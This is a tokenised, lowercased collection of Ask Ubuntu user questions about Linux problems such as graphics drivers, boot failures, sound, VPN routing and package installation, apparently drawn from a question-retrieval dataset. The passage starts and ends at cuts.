prntscr rseinub and similar ) i tried many times to install / uninstall / reinstall the driver , and i can solve the problem with x only entering root in recovery mode and removing the driver ( all files of fglrx ( via apt -get remove - purge fglrx * ) and /etc/x11/xorg.conf ) , but at this point we 're always back to square one , with no driver ! i even tried to manually edit the xorg.conf file generated by the command sudo aticonfig -- initial and create one by myself ( also suggested by the guide that i followed ) by inserting in the `` device '' `` richland [ radeon hd8570d ] '' as the output from lspci -nn | grep vga ( which gives me the following output : ) 00:01.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd / ati ] richland [ radeon hd 8570d ] [ 1002:990 e ] but x will not start , always giving me a black screen and kernel panic . i think i have everything set up correctly , googling a bit i saw that someone suggested to check that in uefi was enabled the onboard card and not pci or pcie , i did that too , still the same story . i even tried to edit the entries `` config__agp `` and `` config_agp_amd64 `` in /boot/config-3.11.0-15-generic , the only result is that putting `` n '' instead of `` y '' only starts the login screen and , after entering the password , it starts a black screen ( but gives me the opportunity to use ctrl + alt + f2 and remove driver again ) . i do n't know anymore how to solve this problem , the driver is the right one ( in the list of supported vga there are also hd8000d series ) , is there someone who managed to install the driver or can suggest me a solution ? thanks in advance .
411757	ubtunu 12.04 x86_64 which proprietary nvidia driver for nvidia gt216glm [ quadro fx 880m ] supports brightness controls on lenvo w510 ?	i have a lenovo w510 and installed ubuntu 12.04 onto it ( 64 bit ) . the device is certified for ubuntu : http : //www.ubuntu.com/certification/hardware/201101-6974/ however that certification page says , i should use a proprietary nvidia driver : proprietary drivers required installation of proprietary nvidia video driver is required for full functionality . now i have trouble finding out which one exactly , the list offers more than one version . with some tries , the first one which i managed to install was : version : 304.108 certified release date : 2013.08.08 see more at : http : //www.nvidia.com/object/linux-display-amd64-304.108-driver.html # sthash.ltrl6d8c.dpuf but the problem with that driver is that brightness controls are not working ( the suggestion to edit xorg.conf did not help here ) . so the question remains : which proprietary nvidia driver version does actually support brightness controls for ubuntu 12.04 on lenovo w510 ?
411759	which version of ubuntu to install ?	i have an old toshiba f10-100 specs are : processor : 1.70 ghz intel速 pentium速 m processor 735 hard disk : 60 gb system memory : 512 mb ( although i am in the process of buying an extra 1g ram for it ) graphics : nvidia geforce go 6600 , 128mb my laptop still runs on xp 32bit and is used mostly for working on my phd - lots of typing , bit of browsing , lots of article reading ( pdfs ) and listening to music . i have a netbook for more everyday tasks . the laptop still works very well , if slowly , but needs a new operating system , i suspect i should install ubuntu 12.04 lts but would appreciate any advice on the matter .
411761	empty desktop , unity launcher & dash missing	when i vnc into my machine all i see is background image with no icons or unity or dash . i ca n't even right click on the desktop . the unity launcher and dash do n't appear either . this first happened a couple weeks ago and i tried a bunch of things like editing my compiz settings , restarting lightdm etc . but none of them worked . somehow , i did manage to get files on my desktop to show up , which made it easy for me to browse to other folders on the machine . now , i ca n't even get that to appear . please let me know if there 's a fix for this . update : just noticed that this only occurs when i vnc into the machine . i have it plugged into a monitor now and everything appears to be normal . update 2 : i just vnc into port 5900 ( ubuntu remote desktop ) instead of using a tightvncserver port ( 590x ) . do n't know why the tightvnc sessions could n't get unity or dash to load . this is not really a fix but can hopefully help someone .
411764	when i run software update on ubuntu13.10 it says that it failed to download repository information and to check internet connectivity	i m very new to ubuntu . i just have installed ubuntu13.10 . in the starting i was able to install the software and plugins but but sudden ubuntu started showing `` failed to download repository information '' `` check your internet connection . '' but internet is working fine . i tried many suggestion and searched google for solving this . plz help me .
411766	how to upgrade ubuntu 12.04 to 12.10 final not beta without a cd	i tried doing this before from the software updater and it upgraded me to 12.10 and then i upgraded to 13.04 and then when i tried to upgrade to 13.10 it said that it ca n't because i 'm using a daily build so how do i avoid upgrading to a daily build from ubuntu 12.04 as i assume that the 12.10 was a daily build install too . also if i try to upgrade via cd/dvd it hangs when it asks me if i want to install updates and or proprietary software .
411768	how to dualboot with windows 8.1 , for the comically inept	so i have a lenovo laptop ( 1tb , 4 gb ram , amd ) running windows 8.1 , and i 've basically spent the past day trying to get ubuntu dual-boot up-and-running on my laptop ( i need it to run programs for school ) , but i seem to be remarkably adept at being stonewalled . here 's a summary of the sweaty deathmatch with the computer to date : i disabled quickstart and the uefi secure boot thingy , and downloaded ubuntu 13.10 ( desktop amd x64 ) onto a 4 gb usb stick , using the universal usb installer 1.9.5.2 . i partitioned 50 gb for it , which is now sitting unused . i restarted the computer holding f12 , and then again mashing f12 , and then all that again with f1 , but for some reason i consistantly failed to bring up any special boot menu ( if anybody 's got anything on that , that would be much appreciated , although that 's not the primary problem here ) . so i found the advanced startup ( inside pc settings ) , and i did that , and i was able to boot from my usb no problem ( 'run but do n't install ' option ) . it gave me the ubuntu boot screen ( purple fill with the ubuntu symbol and the four loading dots ) , and then cut to the black screen with the white text ( you can tell that i know nothing about software ) complaining about kernel problems . so i did it again , this time reformatting the usb drive and installing ubuntu 12.04 with unetbootin . when i restarted with the 12.04 usb , it told me that it was 'unable to find a medium containing a live file system ' , or something like that . so then i switched from the usb port 3.0 to the usb 2.0 and tried again . it did not show any error message , but it still dumped me in the same dark-bg-white-text screen with a command prompt , instead of any legible desktop . ( as near as i can tell , this is the closest i 've gotten to getting ubuntu functional ) . i tried disabling every mention of uefi i could find in the troubleshooting menu ( i had already gone in there previously to disable safestart ) , and restarting it in legacy mode but when i did that i got the 'unable to find medium ' error , regardless of which usb port i used . so i reverted to uefi mode and tried a different tack ; i downloaded wubi , 18 gb . but i got this error message : 'nonetype ' object has no attribute 'get_info ' . for more information , please see the log file : c : \users\lukemacy\appdata\local\temp\wubi-12.04.3-rev.279.log and i know that this bug is very similar to a known bug ( if not the same bug entirely ) , which has had fixes posted by helpful users like yourselves . the problem is i have no idea what those fixes , with their technical jargon , meant . also , the standard bug typically points to a different wubi file ( 26-something , as opposed to my 279 ) , although i do n't know whether that 's important . anyway , that about sums up my day so far . i 'm so inept ! if anybody has noticed some way i 'm ruining everything or just knows what to do , any help would be most appreciated ! except i have to ask that the explanation be in small words ; i 'm afraid i ca n't understand your mysterious technical sorcery language . thanks so much !
411769	unable to connect wifi in ubuntu 12.04	i am using dell inspiron 3521 laptop and i 'm not able to connect to a wifi device nor to a bluetooth device . earlier i did not faced this kind of problem . but now its there . anyone please guide me .
411770	getting my clock back in kubuntu 13.10	how do i get my clock back in kubuntu 13.10 ? it disappeared on a reboot when i could not update . i 'm still having a number other problems
411771	ubuntu 12.04 restarts immediatly after suspension	i have a hp430 g1 and it is running on ubuntu 12.04 . whenever i try to suspend the computer , close my lid ( it 's supposed to suspend when i close it ) the hard drive and the fans goes silent . after less than 2 seconds it restarts . it 's probably the same problem as i found here in this post . xubuntu 12.04 restarts after suspend - only from my account i am fairly new to ubuntu and i do n't quite see a solution from the previous post . so right now i 'm turning ubuntu off everytime i 'm going anywhere or else my battery gets drained . i have also trued using sudo pm-hibernate and it fails catastrophically . do n't quite know if there 's any more relevant information . hopefully someone else solved this problem already , though i ca n't seem to google it .
411774	can not run maven2 on linux ubuntu 12.04	i am trying to compile a program using maven in my linux 12.04 . in order to do , i use the mvn clean install command . however i get a build error : [ error ] unable to locate the javac compiler in : /usr/lib/jvm/java-6-openjdk-amd64/jre/../lib/tools.jar please ensure you are using jdk 1.4 or above and not a jre ( the com.sun.tools.javac.main class is required ) . in most cases you can change the location of your java installation by setting the java_home environment variable . i check the path and indeed i am missing that critical file . this is what i have : user @ modelx : /usr/lib/jvm/java-6-openjdk-amd64/jre/lib $ ls accessibility.properties im net.properties amd64 images psfontj2d.properties calendars.properties jar.binfmt psfont.properties.ja charsets.jar javazic.jar resources.jar classlist jce.jar rhino.jar cmm jexec rt.jar compilefontconfig.jar jsse.jar security content-types.properties jvm.hprof.txt sound.properties currency.data logging.properties swing.properties ext management tz.properties flavormap.properties management-agent.jar zi fontconfig.properties meta-index so apparently , i am running openjdk , but i am missing files . how do i fix this ?
411777	nvidia gtx570 driver install issues	i 'm having issues installing the nvidia drivers for my gtx570 in ubuntu 13.10 . when i navigate to the additional drivers tab , it states `` no additional drivers available . '' this is a desktop pc , not a laptop , so i 'm stumped as to why i am not seeing anything . i 've tried several different manual installs , but all have resulted in a black screen at reboot and a re-install of the os . any help/tips/tricks would be greatly appreciated . thanks !
411780	cant get alsa to recognize sound device | lenovo g560	i am a returning ubuntu user after a pause of a few years , so i have forgotten quite a bit . my problem is that alsa will not list my soundcard at all.. it cant find it . aplay command returns with : aplay : device_list:221 : no soundcard found ... my hardware does recognize it tho : : ~ $ lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) subsystem : lenovo device 38af flags : bus master , fast devsel , latency 0 , irq 11 memory at 9b100000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel modules : snd-hda-intel 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) subsystem : lenovo device 392d flags : bus master , fast devsel , latency 0 , irq 5 memory at 93000000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel modules : snd-hda-intel** i 've tried several things . this : https : //help.ubuntu.com/community/soundtroubleshooting updated kernel : my sound is not working in ubuntu 12.04 after that update , my system broke , so updated kernel to 3.5.0-45-generic i guess you want the specs as well : http : //www.lapspecs.com/detail/lenovo+g560 || it 's the i5 430m' every time i boot up i get an error report on oss4-dkms : dkms make.log for oss4-4.2-build2005 for kernel 3.5.0-45-generic ( i686 ) cp : can not stat`/lib/modules/3.5.0-45-generic/source/include/linux/limits.h ' : no such file or directory i am out of ideas on how to fix this . help is appreciated !
411781	ubuntu 12.04 latest update completely crippled system	i am dualbooting with windows 8.1 x64 and ubuntu 12.04.3 lts . currently only able to use my windows as my ubuntu boot was crippled by this evening 's update . the update was with lots of packages and so i am unsure which one and why crippled my installation . i am unable to boot normally or login . grub is loading ok , but afterwards something happens and i can not pinpoint the issue . as soon as ubuntu 's pre-logon screen comes up ( and i have to mention it comes with the wrong resolution ) it goes away and the following lines appear : starting anac ( h ) ronistic cron ok stopping anac ( h ) ronistic cron ok then i am greeted with the shell logon option . i am able to logon , but the command startx gives me black screen and i can not go back from it . edit start : forgot to say - my shell logon now claims that i am running ubuntu 12.04.4 lts , and i have not been prompted or agreed on any dist-upgrade . also , i thought 12.04.4 was not going to come out until 16 feb ... ? the new drivers that were installed are nvidia-updates-331 version 331.20 . edit end . i tried recovery and it kind of worked once . i chose recovery from grub and then resume normal boot . then it got me to the normal logon screen , but here is the funny thing . i enter my password , ubuntu accepts it , plays the logon sound , the screen goes blank and then i am returned to the logon screen again to enter my password . and this repeats in an infinite loop ... although , i can easily logon with the guest account , but i am unable to do anything with it , since i have never used or configured it before . i tried running sudo nvidia-xconfig from the shell , but it had no effect . i looked at the new xorg.conf and it is identical to the previous one except for the version number of the drivers , but this line is commented anyway . i tried grub repair , but that did not work as well . i tried logging in though an older kernel - nope . basically , everything that came to mind and i know of , i have tried and it did not have any effect whatsoever on my situation . please help ! i have some work to do and i would rather not do it in windows ... thank you in advance ! edit 2 : i am not sure how , but this update appears to have cleared some bios settings . also , my wifi card was disabled , so i had to re-enable it manually in the bios . does anybody have any idea what could be going on ? edit 3 : moved my .config folder out of the way as suggested , but no result . fixed the bios settings , turn out it is something else unrelated . but now there is something else . this [ 3.106484 ] 4:3:1 : can not set freq 16000 to ep 0x86 appears on the black screen after the gui fails and just before the shell logon pops up . edit 4 : unfortunately , i do not have much more time for experimentation and if i ca n't find a solution soon i will be reinstalling ubuntu . i have regained some usability through the shell interface , but gui only loads for the guest account still . i 'll planning on saving my $ home on another drive and starting clean in a couple of days . what a shame ...
411782	xfsettingsd crashes due to missing xi	when trying to xrdp on my xfce install , xfsettingsd chrashes due to missing xi extension . i am using ubuntu server 13.10 + xubuntu-desktop + xrdp ( branch of xrdp ~ 0.6 ) . from what i managed to find out about the problem , this is a known bug , which at first seems to be wontfix due to op not testing the patch . xi extension appears to be some kind library used with touch devices ( is this correct ? ) . it appears this was fixed in 13.04 . further reading leads me to believe this was fixed ( -- but that 's not about xfsettingsd ) , for xfce-settings-helper in xfce 4.6 : plus in xfce4 there does n't seem to be a xfce-settings-helper can anyone help me out here ? is xfce simply not usable over vnc ( combined with xrdp ) ? thanks for your help
411783	is it possible to do a wireless netboot on an ad-hoc client-server connection ?	i tried to use ipxe but with no luck : no one of my 5 laptops ' wireless nic is compatible with ipxe integrate drivers . i 'm wondering if someone could help me to find a way to do it . my server is a 12.04 ubuntu ltsp server well configured yet ( it works fine with direct rj45 connection to a client and a simple netboot ) . thanks in advance guys !
411784	tera online for ubuntu	i just switched over from windows 7 to ubuntu and am completly new to how ubuntu works , is there a walkthrough that i havnt found for properly installing tera online for ubuntu ? if not could someone tell me how to get a working tera game going : )
411786	choppy animation with glmark2	i just installed ubuntu and currently i am suffering from poor graphics performance . i ran glmark2 to test graphics and while it prints a good fps in console , it does not feel so . animation is not smooth it is choppy . ======================================================= glmark2 2012.08 ======================================================= opengl information gl_vendor : x.org gl_renderer : gallium 0.4 on amd rv630 gl_version : 3.0 mesa 9.2.1 ======================================================= [ build ] use-vbo=false : fps : 54 frametime : 18.519 ms [ build ] use-vbo=true : fps : 64 frametime : 15.625 ms [ texture ] texture-filter=nearest : fps : 58 frametime : 17.241 ms [ texture ] texture-filter=linear : fps : 66 frametime : 15.152 ms [ texture ] texture-filter=mipmap : fps : 59 frametime : 16.949 ms [ shading ] shading=gouraud : fps : 62 frametime : 16.129 ms [ shading ] shading=blinn-phong-inf : fps : 59 frametime : 16.949 ms [ shading ] shading=phong : fps : 61 frametime : 16.393 ms [ bump ] bump-render=high-poly : fps : 55 frametime : 18.182 ms [ bump ] bump-render=normals : fps : 66 frametime : 15.152 ms [ bump ] bump-render=height : fps : 55 frametime : 18.182 ms [ effect2d ] kernel=0,1,0 ; 1 , -4,1 ; 0,1,0 ; : fps : 32 frametime : 31.250 ms [ effect2d ] kernel=1,1,1,1,1 ; 1,1,1,1,1 ; 1,1,1,1,1 ; : fps : 16 frametime : 62.500 ms [ pulsar ] light=false : quads=5 : texture=false : fps : 63 frametime : 15.873 ms [ desktop ] blur-radius=5 : effect=blur : passes=1 : separable=true : windows=4 : fps : 19 frametime : 52.632 ms [ desktop ] effect=shadow : windows=4 : fps : 33 frametime : 30.303 ms [ buffer ] columns=200 : interleave=false : update-dispersion=0.9 : update-fraction=0.5 : update-method=map : fps : 41 frametime : 24.390 ms [ buffer ] columns=200 : interleave=false : update-dispersion=0.9 : update-fraction=0.5 : update-method=subdata : fps : 41 frametime : 24.390 ms [ buffer ] columns=200 : interleave=true : update-dispersion=0.9 : update-fraction=0.5 : update-method=map : fps : 42 frametime : 23.810 ms [ ideas ] speed=duration : fps : 45 frametime : 22.222 ms [ jellyfish ] < default > : fps : 40 frametime : 25.000 ms [ terrain ] < default > : fps : 7 frametime : 142.857 ms [ conditionals ] fragment-steps=0 : vertex-steps=0 : fps : 59 frametime : 16.949 ms [ conditionals ] fragment-steps=5 : vertex-steps=0 : fps : 52 frametime : 19.231 ms [ conditionals ] fragment-steps=0 : vertex-steps=5 : fps : 60 frametime : 16.667 ms [ function ] fragment-complexity=low : fragment-steps=5 : fps : 61 frametime : 16.393 ms [ function ] fragment-complexity=medium : fragment-steps=5 : fps : 51 frametime : 19.608 ms [ loop ] fragment-loop=false : fragment-steps=5 : vertex-steps=5 : fps : 60 frametime : 16.667 ms [ loop ] fragment-steps=5 : fragment-uniform=false : vertex-steps=5 : fps : 61 frametime : 16.393 ms [ loop ] fragment-steps=5 : fragment-uniform=true : vertex-steps=5 : fps : 46 frametime : 21.739 ms ======================================================= glmark2 score : 49 ======================================================= why even with good fps animation is so poor ? how could i further diagnose this problem ?
411787	signing up for ubuntu one -- it says `` please verify your email . ''	what does `` please verify your email . '' mean ? i double checked and i entered my email address , spelled correctly , formatted correctly , etc .
411790	icaclient draws grids all over my screen	i followed the instructions on https : //help.ubuntu.com/community/citrixicaclienthowto to get my citrix client to work on my ubuntu 13.10 64 bit system which i bought pre-loaded from system 76 . it was a daunting task to get the citrix client to work in the 1st place . it only works with chrome , not firefox . and when the citric receiver is running it draws the screen with grids all over the screen . each screen can be different depending on how busy the screen is , but begins right at the beginning . i use this for work and am close to having to go buy a cheap windows box because this is unbearable . i have a windows 7 vm running and the receiver also draws the grid on that system , so i 'm not sure if it has to do with the hd resolution on my screen or what ?
411791	13.10 intuos ctl 480/s	i can not install this tablet - the instructions are all too complicated . if anyone has time could they please write step by step instructions for someone like me who is just learning . thanks .
411792	what is the correct way to create your own packages for local installation ?	i am running an ubuntu 12.04 lts server . i currently have an issue where one of my used packages has an annoying bug . instead of removing it and just building it from source , i want to integrate it into ubuntus/debians package management . coming from archlinux we did this by copying the original pkgbuild and changing it in such a way that it compiles the new package . this is a very simple process but it informs the package manager about this package even though it is in no local repositories . is there a similar way for ubuntu/debian ? can i easily base my package on the outdated ubuntu version and install this package instead of the original repository one ? note : the concerning software is libvirt ( i need 0.9.13 at least , 12.04 runs 0.9.8 ) and while i would appreciate a solution for this particular package in the comments , i am looking for a more general solution for such problems should they arise in the future . contrary to questions how can i manually assemble my own package âthe hard wayâ ? and what is the simplest debian packaging guide ? i am not interested in creating a new package but instead using existing resources and update them to a newer version .
411793	mount .iso using the terminal	i 've been trying to mount an .iso according to a guide i read here , but every time i run the command sudo mount -o loop /home/varbo/downlaods/windows 7 ultimate sp1.iso /media/iso i get the same ( usage ) error : usage : mount -v : print version ... usage and options deleted ... . other options : [ -nffrsvw ] [ -o options ] [ -p passwdfd ] . for many more details , say man 8 mount . any kind of help would be appreciated .
411798	access other devices on pptp vpn	i have set up a pptp vpn on ubuntu 12.04 , and it seems to be working . i am able to connect to it from a remote device , and once connected , i can see the vpn server , ssh into it , and so on , all without any problem . so clearly it is working . however , i can not access any other devices on the same network . i have set up ip forwarding by uncommenting the line net.ipv4.ip_forwarding=1 and restarting syctl . i thought that i had opened the firewall to allow it , but something is not working , and the only device i can access on the remote network is the vpn server itself . i actually have another vpn server on a different network set up similarly , except it is working , so clearly something is different .
411800	how do i tell my internal ip to send to my external ip ?	i have set up everything necessary for a minecraft server , i have a dns client with ddclient which is sent from helloworld.dyndns.org to my external ip i have an static internal ip but there is a missing link between the internal and the external ip ? it should go helloworld.dyndns.org > 90.201.0.137 > ! 192.168.0.5 the ' > ! ' is the missing link ( i think ) . i have configured the settings in the router config for it to go through the port 25565 and also in the minecraft config file . do i need to specify the port i want to use anywhere else ? or is that step complete and there is something else missing ? help ! ! thanks
411807	when i close my laptop lid , the keyboard stops working	i am very new to linux and dont really understand how it works so please be specific in your answer . every time i close the laptop lid and it goes into hibernating mode when i reopen it the keyboard does not work at all . the mouse moves and clicking on things works too , i can even get the onscreen keyboard to work to type the password in . but none of the actual keys on it will work unless i actually restart it which is really annoying . i have an old sony laptop ( i dont know the exact model because the stickers are missing ) but it never did this when it had windows . does anybody know whats wrong ?
411809	nautilus-dropbox : depends : dropbox but it is not going to be installed	i was trying to install dropbox on ubuntu 13.10 my first attempt was to follow the steps from official site : cd ~ & & wget -o - `` https : //www.dropbox.com/download ? plat=lnx.x86_64 '' | tar xzf - ~/.dropbox-dist/dropboxd also it installed dropbox , i was not able to see the icon on the panel ( i tried this post , but the icon has not appeared ) . in addition to this , i was not starting automatically and i needed to do ~/.dropbox-dist/dropboxd on each start . so i uninstalled dropbox with the commands from their website and tried to follow steps described here : sudo apt-key adv -- keyserver pgp.mit.edu -- recv-keys 5044912e sudo add-apt-repository `` deb http : //linux.dropbox.com/ubuntu precise main '' sudo apt-get update & & sudo apt-get install nautilus-dropbox but this resulted in the following error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nautilus-dropbox : depends : dropbox but it is not going to be installed e : unable to correct problems , you have held broken packages . any idea how it should be solved ?
411814	i need help . im installing ubuntu and i keep getting the `` extraction failed with code 2 '' error	i am attempting to download ubuntu 12.04 with the windows installer and after some time of downloading , i get this error : extraction failed with code : 2 '' . what can i do to download ubuntu easily and have double boot between ubuntu and windows 7 , without destroying my windows 7 ? thanks
411816	ubuntu will not boot , no matter what i do . need help !	ubuntu is not booting from a usb on my acer v3-571g . i have tried using a 8gb sandisk cruzer memory stick , formatted as fat32 , and this returned a black screen with the 'syslinux : peter anvin et al ' error . i used unetbootin to create the memory stick . this error always used to happen on my little acer d250 netbook , and the reason was because the memory stick needed to be formatted as fat , and not fat32 . i formatted the memory stick as fat and made another usb in unetbootin . this time i was using my 4gb tdk usb drive . the unetbootin menu came up but it froze when i clicked any of the boot options . even if i left it past the boot timeout , it would still freeze . i then used lili usb creator instead , again with the tdk memory stick , but this does n't work either . i get to the purple ubuntu screen with the keyboard symbol and the man symbol , and then it goes onto a black screen with a blinking cursor . the laptop is in legacy boot mode with secure boot disabled . any help would be greatly appreciated . thanks .
411817	multiarch on 64bit ubuntu 13.04	i 'm trying to get the 32 bit libaio1 package on 64bit ubuntu 13.04 . is this possible , and if so , how ? i read a thread on multi-arch and it makes it sound as easy as running sudo apt-get install libaio1 : i386 however , i get an error that states it is unable to locate package . i 've also downloaded the i386 deb for libaio1 , but am unable to install it via the ui or sudo dpkg -i libaio1.deb because it complains that the architecture does n't match the system .
411818	ubuntu one is not syncing , what is wrong ?	i use windows 7 and have installed ubuntu one . it worked properly the whole time , but for some weeks now , the files/folders are not syncing to the cloud anymore/backwise . it always says `` file syncing starting '' , but nothing happens . i re-installed it , but nothing has changed .
411823	13.10 - how to use the maximal resolution with an acer x233h monitor ?	i reported this as a bug already ( https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/1272621 ) but as i think this might be useful to other users , i thought i should ask for a fix here . i use ubuntu 13.10 64bits on my asus f201e , and when i plug in my acer x233h via vga as an external monitor , the maximal resolution available in `` system settings > screen display '' is 1024×768 ( as well as 800×600 ) , but the maximal resolution of the screen is supposed to be 1920×1080 . i have no proprietary drivers available in `` system setting > software & updates > additional drivers '' , and i installed the latest version of the intel linux graphics drivers from https : //01.org/linuxgraphics/downloads , thinking it would help ( version 1.0.3 ) , to no avail . this seems it should not be the default behaviour . any help would be greatly appreciated , as this external monitor ends up having a maximal resolution that is inferior to my tiny laptop ... : ) details about my computer : distrorelease : ubuntu 13.10 package : xserver-xorg-video-intel 2:2.99.904-0ubuntu2 procversionsignature : ubuntu 3.11.0-15.23-generic 3.11.10 uname : linux 3.11.0-15-generic x86_64 .tmp.unity.support.test.0 : apportversion : 2.12.5-0ubuntu2.2 architecture : amd64 compizplugins : no value set for `/apps/compiz-1/general/screen0/options/active_plugins' compositorrunning : compiz compositorunredirectdriverblacklist : ' ( nouveau|intel ) . *mesa 8.0' compositorunredirectfsw : true date : sat jan 25 16:07:16 2014 distupgraded : 2013-10-26 12:01:35,166 debug enabling apt cron job distrocodename : saucy distrovariant : ubuntu dkmsstatus : hdjmod , 1.28 , 3.11.0-13-generic , x86_64 : installed hdjmod , 1.28 , 3.11.0-14-generic , x86_64 : installed hdjmod , 1.28 , 3.11.0-15-generic , x86_64 : installed extradebugginginterest : yes , if not too technical graphicscard : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0106 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device [ 1043:108d ] installationdate : installed on 2013-05-13 ( 257 days ago ) installationmedia : ubuntu 13.04 `` raring ringtail '' - release amd64 ( 20130424 ) machinetype : asustek computer inc. x201ep markforupload : true procenviron : language=en_au : en path= ( custom , no user ) xdg_runtime_dir= < set > lang=en_au.utf-8 shell=/bin/bash prockernelcmdline : boot_image=/boot/vmlinuz-3.11.0-15-generic root=uuid=4391c015-75c5-492f-89fd-f37f7d63b00a ro quiet splash vt.handoff=7 sourcepackage : xserver-xorg-video-intel upgradestatus : upgraded to saucy on 2013-10-26 ( 91 days ago ) dmi.bios.date : 01/18/2013 dmi.bios.vendor : american megatrends inc. dmi.bios.version : x201ep.208 dmi.board.asset.tag : atn12345678901234567 dmi.board.name : x201ep dmi.board.vendor : asustek computer inc. dmi.board.version : 1.0 dmi.chassis.asset.tag : no asset tag dmi.chassis.type : 10 dmi.chassis.vendor : asustek computer inc. dmi.chassis.version : 1.0 dmi.modalias : dmi : bvnamericanmegatrendsinc. : bvrx201ep.208 : bd01/18/2013 : svnasustekcomputerinc. : pnx201ep : pvr1.0 : rvnasustekcomputerinc. : rnx201ep : rvr1.0 : cvnasustekcomputerinc . : ct10 : cvr1.0 : dmi.product.name : x201ep dmi.product.version : 1.0 dmi.sys.vendor : asustek computer inc. version.compiz : compiz 1:0.9.10+13.10.20131011-0ubuntu1 version.ia32-libs : ia32-libs n/a version.libdrm2 : libdrm2 2.4.46-1ubuntu1 version.libgl1-mesa-dri : libgl1-mesa-dri 9.2.1-1ubuntu3 version.libgl1-mesa-dri-experimental : libgl1-mesa-dri-experimental n/a version.libgl1-mesa-glx : libgl1-mesa-glx 9.2.1-1ubuntu3 version.xserver-xorg-core : xserver-xorg-core 2:1.14.5-1ubuntu2~saucy1 version.xserver-xorg-input-evdev : xserver-xorg-input-evdev 1:2.7.3-0ubuntu3.1 version.xserver-xorg-video-ati : xserver-xorg-video-ati 1:7.2.0-0ubuntu10 version.xserver-xorg-video-intel : xserver-xorg-video-intel 2:2.99.904-0ubuntu2 version.xserver-xorg-video-nouveau : xserver-xorg-video-nouveau 1:1.0.9-2ubuntu1 xserver.boottime : sat jan 25 11:16:25 2014 xserver.configfile : default xserver.errors : xserver.logfile : /var/log/xorg.0.log xserver.outputs : product id 12380 vendor auo xserver.version : 2:1.14.5-1ubuntu2~saucy1
411827	clock & date wo n't show up on boot sometimes in ubuntu 13.10	just like you can see in the screenshot above , sometimes the clock & date wo n't show up on boot . i have to log off to make it appear again . is that because i have a custom-time format in dconf editor ( % a , % d . % h % h : % m ) ?
411831	updating gedit by compile , make and install the .tar.xz	basic specs - ubuntu 13.10 , gnome 3 ( session fallback ) , ambiance theme , faenza icons . i noticed i was using an outdated version of gedit and decided it was a great opportunity to try to compile , make and install the .tar.xz file , something i have never done before and , as i expected , i encountered some problems along the way . the following is the step by step of the process and the issues i encountered : downloaded the file open terminal run cd downlaods run tar -jxvf gedit-3.11.2.tar.xz run cd gedit-3.11.2 run ./configure [ some issues ] i had to update my autoconf and intltool run ./configure after installing/updating autoconf and intltool get the following error configure : error : enchant library not found or too old . use -- disable-spell to build without spell plugin . run ./configure -- disable-spell and got the following error : configure : error : package requirements ( libxml-2.0 > = 2.5.0 glib-2.0 > = 2.37.5 gio-2.0 > = 2.37.0 gtk+-3.0 > = 3.9.9 gtksourceview-3.0 > = 3.11.2 libpeas-1.0 > = 1.7.0 libpeas-gtk-1.0 > = 1.7.0 gsettings-desktop-schemas ) were not met : no package 'gtk+-3.0 ' found no package 'gtksourceview-3.0 ' found no package 'libpeas-1.0 ' found no package 'libpeas-gtk-1.0 ' found no package 'gsettings-desktop-schemas ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables gedit_cflags and gedit_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . any kind of help is greatly appreciated and thanks in advance . ps : does this has anything to do with the fact i use gnome 3 sessions-fallback ?
411832	audio playback freezes on setuidgid from daemontools service	i ca n't seem to use aplay or cvlc in tandem with any other audio applications when it 's running as a service under daemontools . the setup is that i 've got a bash script that i 've got running that plays *.wav files using aplay . if i run the script from the command line , it works fine . the script gets launched under daemontools using the following run script command : exec setuidgid $ user ./script.sh if i run this from the command line , it also does n't work : sudo setuidgid $ user aplay -vn /usr/share/sounds/alsa/front_center.wav this is the output , though it hangs and i have to then kill -9 the pid : playing wave '/usr/share/sounds/alsa/front_center.wav ' : signed 16 bit little endian , rate 48000 hz , mono alsa < - > pulseaudio pcm i/o plugin its setup is : stream : playback access : rw_interleaved format : s16_le subformat : std channels : 1 rate : 48000 exact rate : 48000 ( 48000/1 ) msbits : 16 buffer_size : 24000 period_size : 6000 period_time : 125000 tstamp_mode : none period_step : 1 avail_min : 6000 period_event : 0 start_threshold : 24000 stop_threshold : 24000 silence_threshold : 0 silence_size : 0 boundary : 6755399441055744000 using aplay -n ( non-blocking mode ) does n't seem to make any difference . if i stop all other sound applications , the sound will play , but if i restart any other sound devices , then the script will hang on aplay again . if i run aplay as root , i get the following : $ sudo aplay -vn /usr/share/sounds/alsa/front_center.wav home directory not accessible : permission denied alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave aplay : main:722 : audio open error : device or resource busy is there possibly something that i 'm doing wrong in terms of permissions ?
411836	steam `` preparing to launch '' then a crash with all games	i downloaded team fortress 2 in steam ( did i really have to say that ? ) , but whenever i try to launch it it says `` preparing to launch team fortress 2 '' , then closes out . no error , no nothing . i 'm running ubuntu 13.10 , with an nvidia geforce 6150 le and nvidia-304-updates from synaptic package manager . the weird thing is that this game used to work in windows ( which i do n't have anymore ) . i am also having this problem with dota 2 and all other games . here is the error message for a tf2 crash . error : ld.so : object '/home/isaak/.local/share/steam/ubuntu12_32/gameoverlayrenderer.so ' from ld_preload can not be preloaded : ignored . cgamestreamthread : added instance id 5704 for appid 440 pid 5706 ! = 5705 , skipping destruction ( fork without exec ? ) error : ld.so : object '/home/isaak/.local/share/steam/ubuntu12_32/gameoverlayrenderer.so ' from ld_preload can not be preloaded : ignored . cgamestreamthread : added instance id 5705 for appid 440 /media/isaak/steam flash/steam/steamapps/common/team fortress 2/hl2.sh : line 64 : hl2debug : command not found pid 5708 ! = 5705 , skipping destruction ( fork without exec ? ) cgamestreamthread : added instance id 5707 for appid 440 game removed : appid 440 `` team fortress 2 '' , procid 5703 here is what has been tried so far ( tried debugging tf2 ) : verifying the game cache ( right-clicking game > properties > local files > verify integrity of game cache ) disabling the steam overlay ( steam community in 